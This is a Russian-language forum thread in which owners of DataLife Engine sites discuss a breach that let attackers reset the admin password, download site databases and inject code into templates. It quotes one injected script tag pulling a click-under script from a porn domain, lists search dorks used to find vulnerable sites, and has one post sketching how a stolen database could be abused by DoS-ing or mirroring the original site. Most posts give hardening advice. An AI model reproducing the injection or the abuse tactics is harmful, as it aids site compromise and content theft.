Перейти к публикации

Рекомендованные сообщения

в шаблоне полной новости обнаружил код <script type="text/javascript" src="http://megaporno.ws/click-under.js"></script>

Уж ни этого ли товарища сайт???

Все шаблоны восстановить пришлось из архива так как во многих были разные непонятные зашифрованные коды...

Изменено пользователем hrompic
Ссылка на сообщение
Поделиться на других сайтах

Смотрите у себя в логах заходы с гугла по запросу:

allinurl: index.php?do=
или с Яндекса по запросу:
inurl="index.php?do="

Так собиралась база сайтов на DLE.

(Я при таких заходах сразу вношу IP в бан с указанием причины )

Те у кого слили базы, настоятельно рекомендую отслеживать дубли в гугле, а так же помониторить серч, мастерталк и иже с ними на предмет продажи баз DLE

Ссылка на сообщение
Поделиться на других сайтах

Имхо. Если установили патч устраняющий дыру, то можно не дергаться больше.

Нашел один свой сайт, который не затронуло, т.к. ковырял файл admin.php и просто переименовал его в 123admin.php но в самом скрипте этого не указывал, даже смешно стало когда полез его проверять :)

Ссылка на сообщение
Поделиться на других сайтах

Смотрите у себя в логах заходы с гугла по запросу:

allinurl: index.php?do=
или с Яндекса по запросу:
inurl="index.php?do="

Так собиралась база сайтов на DLE.

(Я при таких заходах сразу вношу IP в бан с указанием причины )

Те у кого слили базы, настоятельно рекомендую отслеживать дубли в гугле, а так же помониторить серч, мастерталк и иже с ними на предмет продажи баз DLE

да кстати, это касется только тех, у кого реально авторские сайты. Копипастеры и варезники могут не беспокоится. Доказать свои права у Вас не получится

Ссылка на сообщение
Поделиться на других сайтах

дубли баз за уникальность уже не прокатят...

1. Вешаем Вашу базу.

Если у Вас прописан HOST то

2. Ваш сайт ДОСим пару недель, с пингом Яши и Гугла (вопрос инетресен, только при наличии большого количества достаточно качественного, конкурентного контента)

Если host не прописан и сайт имеет мало входящих ссылок то банально клеим Ваш сайт как зеркало

Изменено пользователем MiXa
Ссылка на сообщение
Поделиться на других сайтах

У меня вопрос к celsoftу:

у меня права на папку backup стояли 644, могли ли с админки слить базу?

Я не celsoft, но насколько понимаю, запрет к скачиванию файлов из папки выставляется в файле .htaccess, лежащем в этой папке. CHMOD права для слива базы не имеют значения.

Но CHMOD 644, если не ошибаюсь, не дает возможности сделать бэкап в эту папку вообще. Для создания бэкапа, по-моему, должно быть 666.

Ссылка на сообщение
Поделиться на других сайтах

У меня вопрос к celsoftу:

у меня права на папку backup стояли 644, могли ли с админки слить базу?

Я не celsoft, но насколько понимаю, запрет к скачиванию файлов из папки выставляется в файле .htaccess, лежащем в этой папке. CHMOD права для слива базы не имеют значения.

Но CHMOD 644, если не ошибаюсь, не дает возможности сделать бэкап в эту папку вообще. Для создания бэкапа, по-моему, должно быть 666.

потому у меня и стояли такие права, чтобы из админки нельзя было сделать бекап))

А когда мне понадобится, выставлю сделаю бекап, и обратно права поставлю 644

Ссылка на сообщение
Поделиться на других сайтах

потому у меня и стояли такие права, чтобы из админки нельзя было сделать бекап))

А когда мне понадобится, выставлю сделаю бекап, и обратно права поставлю 644

если на папку небы прав на запись, то и сделать бекап невозможно

Ссылка на сообщение
Поделиться на других сайтах

Удалять или переименовать можно следующие файлы:

все в папке engine\inc\

templates.php - редактирование шаблонов

search.php - поиск и замена в бд

dboption.php и dumper.php - оптимизация и бэкап бд.

Можно ещё на файл engine/data/config.php права 444 поставить. Тогда будет нельзя его изменить через админку (раздел настройки движка просто не будет работать)

Тот код, что указал Целсофт - рабочий. Однако его недостаток в том, что не всегда реально ограничить доступ по ИП.

Поэтому мой способ самый верный в том плане, что вы не рискуете давать доступ другим админам, и ничего не сделают с вашей базой, если будет взломан именно ваш акк.

Без удаления файлов такой же эффект можно достич, если сделать как написал Целсофт + сделать отдельную группу пользователей, которой дать полные админские права, не разрешив работу в указаных выше разделах. Но это только на новых версиях.

  • Поддерживаю 2
Ссылка на сообщение
Поделиться на других сайтах

Злоумышленникам девчёнки не дают вот они свою энергию и выплёскивают. А потом они будут рассказывать малолетним девчёнкам, "А я вчера взломал 100 сайтов" а они им "Ой ты такой крутой" а давать всё-равно им не будут Ибо пиписьки у них маленькие воистину.

Ссылка на сообщение
Поделиться на других сайтах

И так, стояла блокировка по ip, эта дыра сбрасывала эту блокировку. Так что блокировка до задницы при восстановлении пароля.

IP адрес "моего хайкера" - 212.92.241.136. Хацкер с Украины - поговорил с юристами, будем подавать иск на провайдера этого "хакера". А он уж пусть решает что делать.

Кстати, по логам смотрел что этот парнишка делал:

1. Пришел с гугла

2. зашел в восстановление пароля юзера с id 1

3. зашел в админку

4. в раздел для бека базы

5. скачал

6. логаут.

За 1 минуту справился :angry:

Я конечно уже поставил ограничения на вход в файл админки через .htaccess но всё же хотелось увидеть нормальную блокировку по IP в новой версии DLE. Это обращение к celsoft

Изменено пользователем aback
Ссылка на сообщение
Поделиться на других сайтах

Ребята, тут такое дело. Что делать, если на сервере нет апача, стоит nginx, тобишь ограничения .htaccess не работают, есть альтернатива?

Ссылка на сообщение
Поделиться на других сайтах

по теме, имхо:

1. если вам вшили в сайт всякую рекламу, напишите админам сайтов куда льют ваш трафик, 99,9% забанят умников

2. если вам вшили новую дыру, закройте сайт на пару дней, проведите ревизию файлов на сервере

3. у вас слили базу:

3.1. база без файлов - это порожняк.

3.2. у вас на сайте нет файлов только ссылки - ГС больше или меньше не расстраивайтесь ;)

3.3. у вас авторский сайт - копипаст никто не отменял (или скажите, что у вас 1 гб ун. контента) - если вы такой уникальный, то сообщаю есть кучу граберов с ДЛЕ сайтов

таким образом, хочу сказать, что пострадали только кто подпадает под п. 1 и п. 2, п.3 может расслабиться, никому ваши базы не нужны...

Ссылка на сообщение
Поделиться на других сайтах

таким образом, хочу сказать, что пострадали только кто подпадает под п. 1 и п. 2, п.3 может расслабиться, никому ваши базы не нужны...

Очень смешно, значит их просто от нечего делать у всех потырили? Всем охото взять и сделать сразу хороший сайт с большим количеством страниц, а это проще и красивее будет сделать с готовой БД, чем гонять граббер по сайтам, т.ч. не надо ля-ля... и если на сайте только ссылки - это не значит, что сайт ГС ;) он даёт людям то, что они искали, а искали они нужные им ссылки :)

Ссылка на сообщение
Поделиться на других сайтах

Всем охото взять и сделать сразу хороший сайт с большим количеством страниц, а это проще и красивее будет сделать с готовой БД, чем гонять граббер по сайтам, т.ч. не надо ля-ля... и если на сайте только ссылки - это не значит, что сайт ГС он даёт людям то, что они искали, а искали они нужные им ссылки

Серебрянные слова однако..

Ссылка на сообщение
Поделиться на других сайтах
Гость
Эта тема закрыта для публикации сообщений.
×
×
  • Создать...